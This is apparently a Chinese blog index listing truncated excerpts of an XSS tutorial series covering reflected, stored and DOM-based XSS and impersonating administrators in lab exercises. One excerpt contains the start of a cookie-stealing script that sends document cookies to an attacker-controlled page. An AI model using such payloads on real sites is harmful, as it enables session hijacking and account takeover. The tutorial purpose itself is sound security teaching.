vodkaDL的博客

文章目录前言基于DOM的XSS总结前言基于DOM的XSS总结

文章目录前言准备工作反射型XSS存储型XSS总结前言  管理员权限的重要性不言而喻，而在渗透测试中如果能够获得管理员权限，无疑将会奠定胜利的基调。本篇将讲述如何利用XSS漏洞冒充管理员，从而达到获得管理员权限的目的。准备工作  在攻击者的服务器端准备脚本执行文件以及cookie获得网页：getcookie.js：var img = document.createElement('img');img.src = "http://127.0.0.1/xss/getcookie.php?COOKIE

文章目录前言存储型XSS最简单的存储型XSS利用存储型XSS获得cookie总结前言在了解了反射型XSS相关方面的内容之后，本篇我们将继续深入了解存储型XSS，通过具体的例子讲解存储型XSS攻击的具体流程与危害。存储型XSS在之前的博客中我们提到过，存储型XSS是被包含在之后的HTTP请求响应中的，并且由于存储型XSS是伴随于留言评论等功能存在的，因此存储型XSS能够跟随留言内容一同被存入服务器，并且可以持续发挥作用。我们先来看一个简单的存储型XSS的例子。最简单的存储型XSS我们先在靶场题目提

文章目录前言反射型XSS最简单的反射型XSS利用反射型XSS获得cookie获得cookie的最简单的方法DNSlog辅助获得cookie总结前言在上一篇博客中我们基本了解了XSS的类型和危害，在本篇中我们将通过具体的例子和讲解，深入理解反射型XSS攻击的具体过程及危害。反射型XSS在上一篇中我们了解到反射型XSS是立即被包含在当前响应的HTTP请求中的，并且具有一次性，接下来我们就来看看一个最简单的反射型XSS例子。最简单的反射型XSS靶场题目首页如下：接着在搜索栏输入一个最简单反射型XS

文章目录前言什么是XSS产生XSS攻击漏洞的原因XSS的类型反射型XSS存储型XSS基于DOM的XSSXSS攻击漏洞的危害冒充受害用户上传木马文件总结前言  本篇将围绕XSS展开，着重介绍什么是XSS，XSS攻击漏洞产生的原因以及XSS的类型，最后简述XSS攻击漏洞造成的危害。什么是XSS  所谓的XSS英文名为Cross-site scripting，翻译过来是跨站点脚本，缩写本应该是CSS，奈何“生不逢时”。由于此CSS容易与前端的CSS冲突，于是只得改为XSS。由跨站点脚本这个中文名也能看出来